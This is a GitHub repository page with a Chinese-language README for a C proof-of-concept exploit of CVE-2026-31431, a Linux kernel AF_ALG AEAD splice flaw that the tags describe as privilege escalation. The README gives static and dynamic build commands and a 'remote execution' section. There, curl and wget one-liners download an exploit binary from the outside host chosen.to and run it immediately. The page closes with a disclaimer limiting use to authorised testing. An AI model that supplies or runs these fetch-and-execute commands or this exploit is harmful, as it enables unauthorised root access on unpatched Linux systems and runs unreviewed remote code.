offsecguy/CVE-2026-31431

GitHub: offsecguy/CVE-2026-31431

针对 Linux 内核 AF_ALG AEAD splice 逻辑缺陷(CVE-2026-31431)的 C 语言 PoC 利用工具,用于漏洞验证与安全研究。

Stars: 0 | Forks: 0

# copy.fail — AF_ALG AEAD splice 原语 (CVE-2026-31431) ## 概述 本项目是原始 Python 原型(由 *offsecguy* 开发)的 **C 移植版**。 它利用 Linux 内核 crypto API (`AF_ALG`),并使用了以下机制: - `authencesn(hmac(sha256),cbc(aes))` AEAD 模式 - `MSG_MORE` 标志 - `splice()` 系统调用 该技术将来自 **只读文件描述符** 的数据通过 crypto 套接字进行馈送,并**逐块**进行处理。 ## ⚙️ 编译 ### 选项 1 — musl(静态构建) ``` musl-gcc -static -Os -s -o exp exp.c -I./zlib-1.3.2 -L./zlib-1.3.2 -lz ``` ### 选项 2 — GCC 静态 ``` gcc exp.c -o exp -lz -s -static ``` ### 选项 3 — GCC 动态 ``` gcc exp.c -o exp -lz -s ``` ## 🚀 远程执行 ``` curl -sLo exp chosen.to/copyfail && chmod +x exp ; ./exp ``` ``` wget chosen.to/copyfail -qO exp && chmod +x exp ; ./exp ``` ## ⚠️ 注意事项 - 需要内核支持 `AF_ALG` - 使用 `zlib` 进行解压缩 - 专为底层内核 crypto 交互与实验而设计 ## 免责声明 本代码仅用于**教育和研究目的**。 请负责任地使用,并且仅在您获得授权测试的系统上使用。
标签:AEAD, AF_ALG, CVE-2026-31431, Hpfeeds, Linux内核, musl libc, POC, splice, Web报告查看器, zlib, 代码移植, 协议分析, 客户端加密, 密码学API, 提权, 数据展示, 权限提升, 概念验证, 漏洞分析, 系统调用, 红队, 网络安全, 路径探测, 逻辑漏洞, 隐私保护, 静态编译